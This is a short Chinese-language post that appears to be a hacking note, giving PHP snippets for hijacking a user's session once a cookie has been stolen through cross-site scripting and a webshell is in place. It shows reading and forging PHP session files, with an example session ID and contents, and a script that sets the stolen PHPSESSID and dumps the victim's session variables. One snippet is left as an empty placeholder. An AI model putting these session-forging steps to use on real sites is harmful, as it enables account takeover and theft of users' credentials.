这里只丢2个代码,用于思路性测试,测试结果也欧克
set.php用于模拟正常设置session(一般就是目标用户正常登陆系统后)
<?php
session_start();
$_SESSION['user']='admin';
$_SESSION['pass']='xtj';
?>
作为黑客,通过跨站拿到以上用户的cookie以后且拿到了webshell可以采取以下措施。
1.一般php的session都写入了临时文件夹(php.ini中有定义以及常量),webshell一般都有读权限,可以直接查看该文件并修改实现修改session变量。
文件名为:sess_eb0ae244711af9259ec247182c828da3,内容为:user|s:5:"admin";pass|s:3:"xtj";,也可以伪造。
<?
//补充ing
?>
2.用户黑客直接伪造session获得对应用户的session凭据:
<?php
session_start();
setcookie('PHPSESSID','eb0ae244711af9259ec247182c828da3');//这里需要先通过跨站代码得到session内容。
foreach($_SESSION as $k=>$v)
{
echo "$k is $v<br>";
}
?>